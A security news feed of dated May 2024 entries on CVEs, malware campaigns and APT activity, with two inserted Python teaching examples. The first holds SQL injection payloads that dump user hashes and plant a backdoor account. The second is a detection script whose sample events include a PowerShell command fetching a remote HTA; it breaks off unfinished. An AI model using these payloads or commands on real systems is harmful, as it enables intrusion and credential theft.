(CVSS score: 7.1) - A heap buffer-overflow vulnerability in the Shader functionality that could be exploited by a malicious actor with non-administrative access to a virtual machine with 3D graphics enabled to create a DoS condition |
||
18.5.24 |
CVE |
(CVSS score: 7.1) - An information disclosure vulnerability in the Bluetooth device that could be exploited by a malicious actor with local administrative privileges on a virtual machine to read privileged information contained in hypervisor memory from a virtual machine |
||
18.5.24 |
CVE |
(CVSS score: 7.1) - An information disclosure vulnerability in the Host Guest File Sharing (HGFS) functionality that could be exploited by a malicious actor with local administrative privileges on a virtual machine to read privileged information contained in hypervisor memory from a virtual machine |
||
18.5.24 |
Group |
Kinsing Demystified A Comprehensive Technical Guide |
||
18.5.24 |
Hacking |
Kinsing Demystified A Comprehensive Technical Guide |
||
18.5.24 |
RAT |
Artificial Sweetener: SugarGh0st RAT Used to Target American Artificial Intelligence Experts |
||
18.5.24 |
CyberSpy |
Tracking the Progression of Earth Hundun's Cyberespionage Campaign in 2024 |
||
18.5.24 |
Backdoor |
More than one legitimate software package was modified to deliver malware in North Korean group’s recent campaign against South Korean organizations. |
||
17.5.24 |
CVE |
A cross-site request forgery (CSRF) vulnerability impacting D-Link DIR-600 routers that allows an attacker to change router configurations by hijacking an existing administrator session |
||
17.5.24 |
CVE |
An information disclosure vulnerability impacting D-Link DIR-605 routers that allows attackers to obtain a username and password by forging an HTTP POST request to the /getcfg.php page |
||
17.5.24 |
WIFI |
This vulnerability exploits a design flaw in the WiFi standard, allowing attackers to trick WiFi clients on any operating system into connecting to an untrusted network. |
||
17.5.24 |
APT |
Kimsuky APT attack discovered using Facebook & MS management console |
||
16.5.24 |
Group |
Threat actors misusing Quick Assist in social engineering attacks leading to ransomware |
||
16.5.24 |
CVE |
Type Confusion in V8 in Google Chrome prior to 125.0.6422.60 allowed a remote attacker to execute arbitrary code inside a sandbox via a crafted HTML page. (Chromium security severity: High) |
||
16.5.24 |
APT |
ESET researchers provide technical analysis of the Lunar toolset, likely used by the Turla APT group, that infiltrated a European ministry of foreign affairs |
||
16.5.24 |
APT |
ESET researchers provide technical analysis of the Lunar toolset, likely used by the Turla APT group, that infiltrated a European ministry of foreign affairs |
||
16.5.24 |
REPORT |
400k Linux servers compromised for cryptocurrency theft and financial gain |
||
16.5.24 |
Cryptocurrency |
Ebury botnet alive & growing; 400k Linux servers compromised for cryptocurrency theft and financial gain |
||
16.5.24 |
The vivisection of a large Linux server-side credential stealing malware campaign |
|||
16.5.24 |
Virus |
A new malware dubbed Cuttlefish was reported to infect small office/home office and enterprise-grade routers with the intent to monitor passing data traffic and discreetly exfiltrate only authentication-related information such as usernames, passwords, tokens, etc. It also has the capability of introducing more payloads. |
||
16.5.24 |
Virus |
Remcos RAT, a remote access Trojan, enables unauthorized remote control and surveillance of compromised systems. Recently, Remcos RAT was observed leveraging a PrivateLoader module to augment its functionality and persistence on the victim's machine. By employing VB scripts, registry modification, and establishing services to restart the malware at varying intervals, this malware can thoroughly infiltrate a system, evade detection, and report statistics to its C2 server. |
||
16.5.24 |
Virus |
Many gamers prefer to enhance their gaming experience with custom mods, such as those offering the Windows Borderless feature. This feature enables multitasking and seamless switching between applications, facilitating tasks like game recording. |
||
16.5.24 |
Atomic Stealer (AMOS) among the malware variants spread in the GitCaught operation |
Virus |
A recent malicious campaign dubbed GitCaught has been reported to spread multiple infostealing payloads targeted at various platforms including macOS. The distributed malware variants include Atomic Stealer (AMOS), Vidar Stealer, Lumma and the Octo banking trojan. The attackers have been leveraging fake profiles and repositories hosted on GitHub that offer software binaries masquerading as various popular applications. Threat actors behind this campaign have also been utilizing web-based infrastructure including FileZilla FTP servers for malware delivery. |
|
16.5.24 |
PureCrypter malware used in Mallox ransomware distribution campaign |
Virus |
The PureCrypter loader has been used in a recent malicious campaign leading up to the delivery of Mallox ransomware payloads. The attackers have been reported to employ brute-force attacks against vulnerable or otherwise misconfigured MS-SQL servers in the initial attack stages. PureCrypter is a Malware-as-a-Service (MaaS) offering and is potentially leveraged by various affiliates. The delivered payloads might also exfiltrate user data before encryption, as the Mallox ransomware operators have been known to employ double extortion techniques in past attacks. |
|
16.5.24 |
Virus |
A recent Danabot malspam campaign was observed being delivered via a Word document containing a malicious external link which, if clicked, launches a series of events in which additional executable files get downloaded, including a command prompt and a PowerShell component. This process eventually leads to the dropping of payloads such as iu4t4.exe (Danabot) and rundll32.exe, which are responsible for collecting sensitive user and system information. |
||
15.5.24 |
Phorpiex botnet distributes LockBit Black Ransomware via email campaign |
BOTNET |
A high-volume email campaign facilitated by the Phorpiex botnet, delivering LockBit Black ransomware, has been reported. Phorpiex functions as a Malware-as-a-Service platform and has amassed a significant customer base among threat actors over more than a decade of operation. Since 2018, Phorpiex has been involved in activities such as data exfiltration and ransomware distribution. Despite attempts to disrupt its operations over the years, the botnet continues to persist. |
|
15.5.24 |
Virus |
Dracula (also known as Samurai Stealer) is an infostealing malware variant attributed to the threat group known as the Amnesia Team (aka Cerberus). This threat actor is known for using various other infostealer variants including Aurora, Lumma, Redline and Rhadamanthys, among others. Dracula Stealer is leveraged by the attackers to exfiltrate a wide range of confidential information from victim machines including credentials, banking information and others. |
||
15.5.24 |
Virus |
WaveStealer, a newly emerged sophisticated malware tool, is being distributed on platforms like Telegram and Discord for purchase at a low cost. This malware is disguised as video game installers and designed to extract various types of sensitive data from compromised systems. It targets web browsers, cryptocurrency wallets, credit card numbers, as well as data associated with messaging platforms like Telegram and Discord. Additionally, WaveStealer has the capability to capture screenshots, enhancing its data exfiltration capabilities. |
||
15.5.24 |
Virus |
A malware campaign exploiting Google Ads, attributed to the threat actor FIN7, has been reported in the wild. The attackers utilized deceptive websites masquerading as well-known brands like AnyDesk, WinSCP, BlackRock, Asana, Concur, and Google Meet. Visitors to these sites, often directed through sponsored Google Ads, encountered fake pop-ups urging them to download what seemed to be a browser extension. However, the downloaded payload was actually an MSIX file, a packaging format for Windows apps, which delivered NetSupport RAT and DiceLoader for subsequent stages in the infection chain. |
||
15.5.24 |
Beast Ransomware and Vidar Infostealer delivered via disguised documents |
RANSOM |
Documents like copyright violation warnings and resumes were leveraged in a recent campaign to deliver ransomware and an infostealer. The initial infection starts from a phishing email with an external malicious link that, if clicked, downloads a compressed file. Upon decompression, two executable files are dropped, identified as Beast Ransomware and Vidar Infostealer. |
|
15.5.24 |
SPAM |
Mobile wallets have transformed the financial landscape by providing convenience and accessibility, but they also present lucrative targets for cybercriminals as Symantec continues to observe a flurry of smishing around the world. |
||
15.5.24 |
RANSOM |
According to recent research published by Cyble, Trinity is a newly identified ransomware variant believed to be an updated version of the "2023Lock" ransomware. The malware encrypts user files and appends the ".trinitylock" extension to them. Trinity ransomware has also been reported to share some code base with yet another ransomware variant known as Venus. The threat actors behind Trinity are employing double extortion techniques by also exfiltrating confidential files and threatening to publicly release them. |
||
15.5.24 |
Malspam campaign delivers AsyncRAT by way of multiple scripts |
Virus |
In a recently observed campaign, multiple scripts were used to deliver the AsyncRAT payload. Initiated by an HTML email attachment, victims would be compromised by various non-PE files that deliver AsyncRAT and establish its persistence. The attack downloads a Windows Script File (WSF) that in turn launches a VBS file responsible for further execution. Latter parts of the attack are carried out by JS, PowerShell, and batch script components. |
|
15.5.24 |
RANSOM |
Symantec Security Response is aware of the recent joint alert from CISA, the FBI, the Department of Health and Human Services (HHS), and the Multi-State Information Sharing and Analysis Center (MS-ISAC) regarding a number of targeted activities observed for the Black Basta ransomware. This malware variant has been known since at least 2022 and has been leveraged in a number of campaigns targeted at critical infrastructure including the Healthcare and Public Health (HPH) sector. Black Basta is a ransomware-as-a-service (RaaS) variant mostly distributed via phishing or exploitation of disclosed vulnerabilities. The attackers behind this malware often employ the double extortion model by not only encrypting user files but also exfiltrating them and threatening public release of the stolen data. |
||
15.5.24 |
Virus |
Researchers uncovered a new mining trojan dubbed "Hidden Shovel", discovered through network security monitoring. This Trojan was initially spotted back in November 2023 and has been undergoing multiple upgrades, currently at version 3.0. Hidden Shovel's key features are strong concealment, anti-analysis measures, DLL hijacking backdoor and shellcode injection capabilities. |
||
15.5.24 |
Social |
Ongoing Social Engineering Campaign Linked to Black Basta Ransomware Operators |
||
15.5.24 |
CVE |
High CVE-2024-4761: Out of bounds write in V8. Reported by Anonymous on 2024-05-09 |
||
15.5.24 |
CVE |
(CVSS score: N/A) - A file inclusion issue in the "lib/plugin.php" file that could be combined with SQL injection vulnerabilities to result in remote code execution |
||
15.5.24 |
CVE |
(CVSS score: 8.8) - An SQL injection vulnerability in api_automation.php that allows authenticated users to perform privilege escalation and remote code execution |
||
15.5.24 |
CVE |
(CVSS score: 10.0) - A command injection vulnerability allows any unauthenticated user to execute arbitrary command on the server when the "register_argc_argv" option of PHP is On |
||
15.5.24 |
CVE |
(CVSS score: 9.1) - An arbitrary file write vulnerability in the "Package Import" feature that allows authenticated users having the "Import Templates" permission to execute arbitrary PHP code on the web server, resulting in remote code execution |
||
15.5.24 |
CVE |
(CVSS score: 8.8) - Windows MSHTML Platform Security Feature Bypass Vulnerability |
||
15.5.24 |
CVE |
(CVSS score: 7.8) - Windows Desktop Window Manager (DWM) Core Library Elevation of Privilege Vulnerability |
||
14.5.24 |
CVE |
(CVSS score: 8.1) - A buffer overflow vulnerability that could allow a remote unauthenticated attacker to execute arbitrary code on the targeted system by sending a specially crafted SMS message. |
||
14.5.24 |
CVE |
(CVSS score: 7.8) - An improper privilege management vulnerability that could allow a local, low-privileged attacker to elevate privileges to manufacturer level on the targeted system. |
||
14.5.24 |
CVE |
(CVSS score: 6.8) - A files or directories accessible to external parties vulnerability that could allow an attacker with physical access to the target system to obtain read/write access to any files and directories on the targeted system, including hidden files and directories. |
||
14.5.24 |
CVE |
(CVSS score: 4.4) - A relative path traversal vulnerability that could allow a local, low-privileged attacker to escape from virtual directories and get read/write access to protected files on the targeted system. |
||
14.5.24 |
CVE |
(CVSS score: 3.3) - An exposure of sensitive information vulnerability that could allow a local, low-privileged attacker to disclose hidden virtual paths and file names on the targeted system. |
||
14.5.24 |
CVE |
(CVSS score: 3.3) - An exposure of sensitive information through environmental variables vulnerability that could allow a local, low-privileged attacker to obtain unauthorized access to the targeted system. |
||
14.5.24 |
CVE |
(CVSS score: 2.4) - An exposure of sensitive information vulnerability that could allow an attacker with physical access to the target system to get access to sensitive data on the targeted system. |
||
12.5.24 |
CVE-2024-24506 - LimeSurvey Community Edition XSS vulnerability |
VULNERABILITY |
CVE-2024-24506 is a recently disclosed Cross Site Scripting (XSS) vulnerability affecting LimeSurvey Community Edition version 5.3.32. The bug is caused by improper validation of user-supplied input in the Administrator email address field. If successfully exploited, the vulnerability might allow remote attackers to insert and execute arbitrary code via the Administrator email address parameter. |
|
12.5.24 |
VULNERABILITY |
CVE-2024-1313 is a recently disclosed Broken Object-Level Authorization (BOLA) vulnerability affecting Grafana, an open-source data visualization web application. Successful exploitation of this vulnerability might potentially lead to unauthorized access and data leaks from the vulnerable dashboards. Unprivileged attackers might be able to bypass authorization and also delete Grafana dashboard snapshots. Grafana has already released a patch to address this vulnerability. |
||
11.5.24 |
Stealer |
zEus Stealer Distributed via Crafted Minecraft Source Pack |
||
11.5.24 |
REPORT |
Black Basta affiliates use common initial access techniques—such as phishing and exploiting known vulnerabilities—and then employ a double-extortion model, both encrypting systems and exfiltrating data. |
||
11.5.24 |
Ransomware |
Black Basta affiliates use common initial access techniques—such as phishing and exploiting known vulnerabilities—and then employ a double-extortion model, both encrypting systems and exfiltrating data. |
||
11.5.24 |
APT |
FIN7 Uses Trusted Brands and Sponsored Google Ads to Distribute MSIX Payloads |
||
11.5.24 |
Malware traffic |
Zip files are password-protected. Of note, this site has a new password scheme. For the password, see the "about" page of this website. |
||
10.5.24 |
Exploitation of Ivanti Pulse Secure vulnerabilities for Mirai botnet delivery |
Exploit |
In January of this year, Ivanti reported two vulnerabilities, CVE-2023-46805 (Authentication Bypass) & CVE-2024-21887 (Command Injection), affecting Ivanti Connect Secure and Ivanti Policy Secure Gateways. |
|
10.5.24 |
Malware campaign targeting Windows and MS Office users via software cracks |
Virus |
A malware campaign distributing RATs and coinminers via cracks for popular software, specifically targeting users of Windows and MS Office software, has been observed. The malware, once installed, often registers commands in the task scheduler to maintain persistence, enabling continuous installation of new malware even after removal. |
|
10.5.24 |
Coper Actors Abuse LiveChat CDN in Ongoing Fake Chrome Tactic |
Virus |
Symantec continues to observe daily instances of Coper malware disguised as a fake Chrome Android application. This tactic is not new, having been in use for some time now. The attack chain's initial step remains uncertain, but recently observed Coper samples have been hosted on a content delivery network (CDN) used by LiveChat, a customer service platform. |
|
10.5.24 |
Malspam campaign: Password protected archive hosted on GitHub leads to AsyncRAT |
CAMPAIGN |
Over the past two weeks, Symantec has observed an actor leveraging a peculiar attack chain to distribute a highly obfuscated payload onto compromised systems. The attacks start with malicious emails containing a malicious PDF, DOCX, or SVG file (REMITIRA A TRAVES DEL SERVICIO POSTAL AUTORIZADO.docx, Radicado juridico 23156484.svg, and 99-DEMANDA .docx). |
|
10.5.24 |
Exploit |
The use of Russian bulletproof hosting services for hosting malicious activities, including command-and-control (C2) servers and phishing pages distributing SocGholish malware, has been reported. Multiple malware campaigns in recent months have utilized the Matanbuchus loader, with their C2 infrastructure hosted on bulletproof hosting services like "Proton66 OOO". |
||
10.5.24 |
Virus |
A malware campaign targeting Minecraft players has been reported, where custom packages promising to enhance the game's appearance are actually distributing the zEus stealer. This infostealer is designed to evade detection while stealing sensitive data and dropping additional payloads, typically in the form of a batch file, to establish communication with a command-and-control (C2) server for further instructions. This malware is capable of capturing screenshots and exfiltrating data to a webhook server controlled by the threat actor. |
||
10.5.24 |
VPN |
Tricking the VPN client into using the wrong server IP |
||
10.5.24 |
VPN |
On Windows, Linux, macOS and Android we are not vulnerable to the LocalNet attack. We never leak traffic to public IPs outside the VPN tunnel. However, on iOS we are affected by this attack vector. |
||
10.5.24 |
CVE |
CVE-2024-4671: Use after free in Visuals. Reported by Anonymous on 2024-05-07 |
||
10.5.24 |
Android |
Coper is a descendant of ExoBotCompat, which was a rewritten version of Exobot. |
||
10.5.24 |
CVE |
Ignition before 2.5.2, as used in Laravel and other products, allows unauthenticated remote attackers to execute arbitrary code because of insecure usage of file_get_contents() and file_put_contents(). This is exploitable on sites using debug mode with Laravel before 8.4.2. |
||
10.5.24 |
Cloud |
LLMjacking: Stolen Cloud Credentials Used in New AI Attack |
||
10.5.24 |
Bypassing Tunnels: Leaking VPN Client Traffic by Abusing Routing Tabl |
Papers |
Virtual Private Networks (VPNs) authenticate and encrypt network traffic to protect users’ security and privacy, and are used in professional and personal settings to defend against malicious actors, circumvent censorship, remotely work from home, etc. It is therefore essential that VPNs are secure. |
|
10.5.24 |
VPN |
TunnelCrack is a combination of two widespread security vulnerabilities in VPNs. An adversary can abuse these vulnerabilities to leak traffic outside the VPN tunnel. |
||
10.5.24 |
VPN |
A local network VPN leaking technique that affects all routing-based VPNs |
||
10.5.24 |
CVE |
DHCP can add routes to a client’s routing table via the classless static route option (121). VPN-based security solutions that rely on routes to redirect traffic can be forced to leak traffic over the physical interface. |
||
10.5.24 |
APT |
APT28 campaign targeting Polish government institutions |
||
9.5.24 |
DHCP |
In DHCP starvation attacks, an attacker floods the DHCP server with DHCP requests to consume all available IP addresses that the DHCP server can allocate. After these IP addresses are allocated, the server cannot allocate any more addresses and this situation leads to a Denial of Service (DoS) attack as new clients cannot gain network access. |
||
9.5.24 |
CVE |
DHCP can add routes to a client’s routing table via the classless static route option (121). VPN-based security solutions that rely on routes to redirect traffic can be forced to leak traffic over the physical interface. |
||
9.5.24 |
CVE |
A command injection vulnerability in web components of Ivanti Connect Secure (9.x, 22.x) and Ivanti Policy Secure (9.x, 22.x) allows an authenticated administrator to send specially crafted requests and execute arbitrary commands on the appliance. |
||
9.5.24 |
CVE |
An authentication bypass vulnerability in the web component of Ivanti ICS 9.x, 22.x and Ivanti Policy Secure allows a remote attacker to access restricted resources by bypassing control checks. |
||
9.5.24 |
CVE |
(CVSS score: 7.5) - An OData injection vulnerability that could allow an unauthenticated attacker to execute malicious SQL statements through the BIG-IP NEXT Central Manager API |
||
9.5.24 |
CVE |
(CVSS score: 7.5) - An SQL injection vulnerability that could allow an unauthenticated attacker to execute malicious SQL statements through the BIG-IP Next Central Manager API |
||
9.5.24 |
Virus |
A malware campaign targeting Minecraft players has been reported, where custom packages promising to enhance the game's appearance are actually distributing the zEus stealer. This infostealer is designed to evade detection while stealing sensitive data and dropping additional payloads, typically in the form of a batch file, to establish communication with a command-and-control (C2) server for further instructions. This malware is capable of capturing screenshots and exfiltrating data to a webhook server controlled by the threat actor. |
||
9.5.24 |
Virus |
APT37 (ScarCruft) continues to distribute RokRAT malware via LNK files, particularly targeting South Korean users. The malware, disguised within a genuine document, executes PowerShell commands after activation. Subsequently, these commands execute additional files, enabling attackers to gather user information and transmit that data back to their C2 servers. |
||
9.5.24 |
CAMPAIGN |
Symantec has recently observed an uptick in phishing campaigns being delivered out of Gadfly (aka TA577). This campaign entices users to open the attached PDF, named with a Latin word, containing a link utilizing typosquatted subdomains for Microsoft login services, with the end goal being credential theft for later use. |
||
9.5.24 |
RANSOM |
Hunt is another Dharma/Crysis ransomware variant discovered recently in the wild. The malware encrypts user files and appends the .hunt extension to them alongside a unique victim ID and the threat actor's email address. The dropped ransom note, in the form of a text file, asks the victims to contact the attackers via the provided email address for further instructions on how to restore the locked files. |
||
9.5.24 |
CVE-2024-27956 - WP-Automatic Plugin SQL Injection vulnerability exploited in the wild |
VULNERABILITY |
CVE-2024-27956 is a recently disclosed critical (CVSS score 9.8) SQL injection (SQLi) vulnerability in the WP-Automatic plugin prior to version 3.92.1. Successful exploitation of this vulnerability might allow attackers to run arbitrary SQL queries, create new admin accounts or upload malicious files onto the compromised servers. This vulnerability has been reported as being actively exploited in the wild. |
|
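The entry above describes the two outcomes an SQLi in a WordPress plugin gives an attacker: reading arbitrary tables and, where the driver accepts stacked statements, writing new rows such as an admin account. The following is an added example (not the plugin's code, and not the CVE-2024-27956 exploit): an in-memory SQLite database with wp_-prefixed tables stands in for MySQL, and executescript stands in for a multi-statement driver call. Table names, the placeholder hash and both payloads are constructed for the demonstration.

```python
import sqlite3

# Constructed stand-in for a WordPress database. Table and column names follow
# the usual wp_ prefix; the password hash is a placeholder, not a real credential.
def make_db():
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE wp_posts (id INTEGER PRIMARY KEY, post_title TEXT);
        CREATE TABLE wp_users (id INTEGER PRIMARY KEY, user_login TEXT, user_pass TEXT);
        INSERT INTO wp_posts VALUES (1, 'hello world'), (2, 'second post');
        INSERT INTO wp_users VALUES (1, 'admin', 'phpass-hash-placeholder');
    """)
    return conn

def search_vulnerable(conn, keyword):
    # The keyword is spliced into the SQL text, so the caller can close the
    # quoted string and append its own clauses (UNION, comments, ...).
    sql = f"SELECT post_title FROM wp_posts WHERE post_title LIKE '%{keyword}%'"
    return [row[0] for row in conn.execute(sql)]

def search_vulnerable_stacked(conn, keyword):
    # Same concatenation, but executed through an API that accepts several
    # statements in one string (executescript stands in for drivers such as
    # PHP's mysqli_multi_query). Now the input can INSERT, not just SELECT.
    sql = f"SELECT post_title FROM wp_posts WHERE post_title LIKE '%{keyword}%'"
    conn.executescript(sql)

def search_safe(conn, keyword):
    # Parameter binding: the driver passes the keyword as a value, so quotes
    # and SQL keywords inside it carry no syntactic meaning.
    sql = "SELECT post_title FROM wp_posts WHERE post_title LIKE ?"
    return [row[0] for row in conn.execute(sql, (f"%{keyword}%",))]

def user_logins(conn):
    return [row[0] for row in conn.execute("SELECT user_login FROM wp_users ORDER BY id")]

# Constructed payloads. The first closes the LIKE string and appends a UNION
# that reads the users table; the second closes the statement and adds an
# INSERT that plants a new account. Both end in a comment ("-- ") so the
# trailing "%'" of the original query is swallowed.
DUMP_USERS = "x%' UNION SELECT user_login || ':' || user_pass FROM wp_users -- "
ADD_ACCOUNT = "x%'; INSERT INTO wp_users VALUES (99, 'backdoor', 'attacker-hash'); -- "

if __name__ == "__main__":
    conn = make_db()
    print("vulnerable:", search_vulnerable(conn, DUMP_USERS))  # leaks the admin hash
    print("safe:      ", search_safe(conn, DUMP_USERS))        # []
    search_vulnerable_stacked(conn, ADD_ACCOUNT)
    print("users:     ", user_logins(conn))                    # admin plus backdoor
```

The hardened function is the same query with a bound parameter; that, not input filtering, is the fix to look for when reviewing a patched plugin release.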
9.5.24 |
RANSOM |
Shinra, a recently discovered ransomware variant from the Proton malware family, encrypts files and appends the ".SHINRA3" extension while renaming file names to random strings. A ransom note is dropped as a text file called "#SHINRA-Recovery.txt" containing contact details, typically the attacker's email address. |
||
9.5.24 |
CVE-2024-2389 - Command Injection vulnerability affecting Progress Flowmon |
VULNERABILITY |
CVE-2024-2389 is a recently disclosed critical vulnerability (CVSS score 10) affecting Progress Flowmon, a widely used network performance monitoring tool. If successfully exploited, the bug allows unauthenticated attackers to reach the Flowmon web interface via crafted API requests, which can lead to arbitrary command execution on vulnerable systems. A proof-of-concept for this vulnerability has been released publicly and the vendor has already issued a patched version of the application. |
|
9.5.24 |
RANSOM |
In February this year the LockBit ransomware operation was the target of a coordinated disruption effort, "Operation Cronos", which saw members of the gang arrested, assets seized and a decryption tool released publicly. Despite those efforts LockBit remains active in the threat landscape and we recently observed a spike in detections related to this ransomware variant. Symantec's Advanced Machine Learning technology played a crucial role in blocking this attack by detecting the malicious emails at the beginning of the attack chain. |
||
8.5.24 |
Loader |
HijackLoader (a.k.a. IDAT Loader) is a malware loader initially spotted in 2023 that is capable of using a variety of modules for code injection and execution. |
||
8.5.24 |
CVE |
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in LiteSpeed Technologies LiteSpeed Cache allows Stored XSS. This issue affects LiteSpeed Cache: from n/a through 5.7. |
||
8.5.24 |
CPU |
Pathfinder: High-Resolution Control-Flow Attacks Exploiting the Conditional Branch Predictor |
||
8.5.24 |
Alert |
The Intelligent Platform Management Interface (IPMI) implementations in multiple manufacturers' Baseboard Management Controller (BMC) software are vulnerable to IPMI session hijacking. |
||
8.5.24 |
Alert |
A vulnerability in the R language that allows for arbitrary code to be executed directly after the deserialization of untrusted data has been discovered. |
||
7.5.24 |
APT |
Uncharmed: Untangling Iran's APT42 Operations |
||
7.5.24 |
CVE-2024-4040 - CrushFTP vulnerability exploited in the wild |
VULNERABILITY |
CVE-2024-4040 is a recently disclosed injection vulnerability affecting CrushFTP versions before 10.7.1 and 11.1.0. Successful exploitation could allow unauthenticated remote attackers to escape the VFS sandbox, bypass authentication, gain administrative privileges and potentially execute arbitrary code remotely on vulnerable servers. The vulnerability has been reported as being exploited in the wild and the vendor has already released a patched version of the application. |
|
7.5.24 |
Counterfeit Revenue Agency page distributing VBlogger malware |
Virus |
A malware campaign involving a counterfeit Revenue Agency webpage hosted on an Italian domain has been reported. Upon accessing the site, users unwittingly download an archive containing a malware downloader, which in turn fetches the final payload via FTP from an Altervista host. The malware, dubbed "VBlogger", is written in VB6 and has keylogging and clipboard capture functionality. The harvested information is stored in a text file and then sent to the command-and-control (C2) server, also hosted on Altervista. |
|
7.5.24 |
Cuckoo: A new macOS malware targeting music ripping applications |
Virus |
A new macOS malware dubbed Cuckoo has been reported. This malware is distributed through websites that offer applications for ripping music from streaming services. Cuckoo boasts extensive functionality, including the collection of browser-stored information such as passwords, cookies, and other credentials. Additionally, it gathers system information and data related to installed cryptocurrency wallets and extensions. |
|
7.5.24 |
Android malware used in targeted attack against Indian defense forces |
Virus |
A new Android malware was reportedly delivered to Indian defense forces through social engineering over WhatsApp, presenting itself as a defense-related application. Once delivered, the application installs itself under the guise of a Contacts app. Upon execution it requests the SMS, Contacts, Storage and Telephone permissions and then hides itself from view. |
|
7.5.24 |
Stealer |
Post-infection traffic triggers signatures for Win32/MetaStealer Related Activity from the EmergingThreats Pro (ETPRO) ruleset. |
||
7.5.24 |
VBS |
CharmingCypress: Innovating Persistence |
||
7.5.24 |
Python |
Technical Deep Dive: Understanding the Anatomy of a Cyber Intrusion |
||
7.5.24 |
CVE |
A command injection vulnerability in web components of Ivanti Connect Secure (9.x, 22.x) and Ivanti Policy Secure (9.x, 22.x) allows an authenticated administrator to send specially crafted requests and execute arbitrary commands on the appliance. |
||
7.5.24 |
CVE |
An authentication bypass vulnerability in the web component of Ivanti ICS 9.x, 22.x and Ivanti Policy Secure allows a remote attacker to access restricted resources by bypassing control checks. |
||
6.5.24 |
CVE |
A use-after-free vulnerability exists in the HTTP Connection Headers parsing in Tinyproxy 1.11.1 and Tinyproxy 1.10.0. A specially crafted HTTP header can trigger reuse of previously freed memory, which leads to memory corruption and could lead to remote code execution. An attacker needs to make an unauthenticated HTTP request to trigger this vulnerability. |
||
6.5.24 |
Apple |
Malware: Cuckoo Behaves Like Cross Between Infostealer and Spyware |
||
5.5.24 |
Elber Reble610 M/ODU XPIC IP-ASI-SDH Microwave Link - Device Config Disclosure |
|||
5.5.24 |
Elber Reble610 M/ODU XPIC IP-ASI-SDH Microwave Link - Authentication Bypass |
|||
5.5.24 |
Elber Cleber/3 Broadcast Multi-Purpose Platform 1.0.0 - Device Config Disclosure |
|||
5.5.24 |
Elber Cleber/3 Broadcast Multi-Purpose Platform 1.0.0 - Authentication Bypass |
|||
5.5.24 |
Elber Signum DVB-S/S2 IRD For Radio Networks 1.999 - Device Config Disclosure |
|||
5.5.24 |
Elber Signum DVB-S/S2 IRD For Radio Networks 1.999 - Authentication Bypass |
|||
4.5.24 |
ANALYSIS |
The report covers the tactics, techniques and tools most commonly deployed by threat actors, the nature of incidents detected and their distribution among MDR customers. |
||
3.5.24 |
NiceCurl and TameCat custom backdoors leveraged by Damselfly APT |
APT |
NiceCurl and TameCat are two custom backdoor variants recently leveraged in malicious campaigns attributed to the Damselfly APT (also known as APT42). These backdoors are reported to be delivered mostly by spear-phishing campaigns and used by the threat actors for the purpose of initial access to the targeted environments. While NiceCurl is a VBScript-based malware with capabilities to download and execute additional modules, TameCat backdoor is used to execute PowerShell and C# scripts as well as download additional arbitrary content. |
|
3.5.24 |
TesseractStealer malware leverages OCR engine for information extraction |
Virus |
TesseractStealer is an infostealer recently distributed by variants of the ViperSoftX malware. This malware leverages Tesseract (an open source OCR engine) in an effort to extract text from user image files. The malware focuses on specific data related to credentials and cryptocurrency wallet information. Next to TesseractStealer, some of the recent ViperSoftX runs have also been observed to drop another payload from the QuasarRAT malware family. |
|
3.5.24 |
CAMPAIGN |
The infection chain for this campaign starts with an email carrying an HTML attachment. The HTML file uses a background image resembling a blank Microsoft Office document, overlaid with instructions on how to "fix" offline viewing of the file; the goal is to trick victims into pasting malicious PowerShell code into a Windows Terminal. Once that code runs, an HTA file is downloaded and executed, which in turn downloads a ZIP file. Once extracted, it launches the open-source automation engine AutoIt to run a malicious compiled AutoIt script named script.a3x, which eventually loads the DarkGate trojan. |
||
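The chain described above (pasted PowerShell, remote HTA via mshta, AutoIt3 running a compiled .a3x script) is visible in process-creation telemetry as a parent/child pattern. The following is an added example, not code from the original report: three ancestry-based rules run over constructed Sysmon-style events. The process names follow the entry; the URL, paths and PIDs are invented (203.0.113.0/24 is a documentation range), and the benign events at the end show the rules do not fire on ordinary PowerShell or AutoIt use.

```python
import re
from dataclasses import dataclass

@dataclass
class ProcEvent:
    pid: int
    ppid: int
    image: str      # basename of the executable
    cmdline: str

# Constructed process-creation events modelled on the entry above.
SAMPLE_EVENTS = [
    ProcEvent(100, 1, "explorer.exe", "explorer.exe"),
    ProcEvent(210, 100, "WindowsTerminal.exe", "WindowsTerminal.exe"),
    ProcEvent(220, 210, "powershell.exe",
              'powershell.exe -NoP -W Hidden -c "Start-Process mshta http://203.0.113.10/fix.hta"'),
    ProcEvent(230, 220, "mshta.exe", "mshta.exe http://203.0.113.10/fix.hta"),
    ProcEvent(240, 230, "cmd.exe",
              'cmd.exe /c "C:\\Users\\Public\\AutoIt3.exe C:\\Users\\Public\\script.a3x"'),
    ProcEvent(250, 240, "AutoIt3.exe", "C:\\Users\\Public\\AutoIt3.exe C:\\Users\\Public\\script.a3x"),
    # Benign noise: an admin runs PowerShell, a developer runs a local AutoIt source script.
    ProcEvent(300, 100, "powershell.exe", "powershell.exe Get-ChildItem C:\\temp"),
    ProcEvent(310, 100, "AutoIt3.exe", "AutoIt3.exe C:\\dev\\build.au3"),
]

REMOTE_HTA = re.compile(r"mshta(?:\.exe)?\s+\S*https?://", re.IGNORECASE)
A3X_SCRIPT = re.compile(r"\S+\.a3x\b", re.IGNORECASE)
SHELLS = {"powershell.exe", "pwsh.exe", "cmd.exe", "windowsterminal.exe"}

def ancestors(ev, by_pid):
    """Image names of the parent, grandparent, ... as far as the telemetry reaches."""
    chain = []
    while ev.ppid in by_pid:
        ev = by_pid[ev.ppid]
        chain.append(ev.image.lower())
    return chain

def detect(events):
    """Return (rule, pid) alerts for the paste-and-run HTA/AutoIt chain."""
    by_pid = {e.pid: e for e in events}
    alerts = []
    for ev in events:
        img = ev.image.lower()
        chain = ancestors(ev, by_pid)
        # Rule 1: mshta fetching an HTA from a URL, launched from a shell.
        if img == "mshta.exe" and REMOTE_HTA.search(ev.cmdline) and chain[:1] and chain[0] in SHELLS:
            alerts.append(("remote_hta_from_shell", ev.pid))
        # Rule 2: AutoIt3 running a compiled .a3x script somewhere below mshta.
        if img == "autoit3.exe" and A3X_SCRIPT.search(ev.cmdline) and "mshta.exe" in chain:
            alerts.append(("autoit_a3x_under_mshta", ev.pid))
        # Rule 3: PowerShell started from Windows Terminal (the paste) that invokes mshta.
        if img in {"powershell.exe", "pwsh.exe"} and "mshta" in ev.cmdline.lower() \
                and chain[:1] == ["windowsterminal.exe"]:
            alerts.append(("pasted_powershell_to_mshta", ev.pid))
    return alerts

if __name__ == "__main__":
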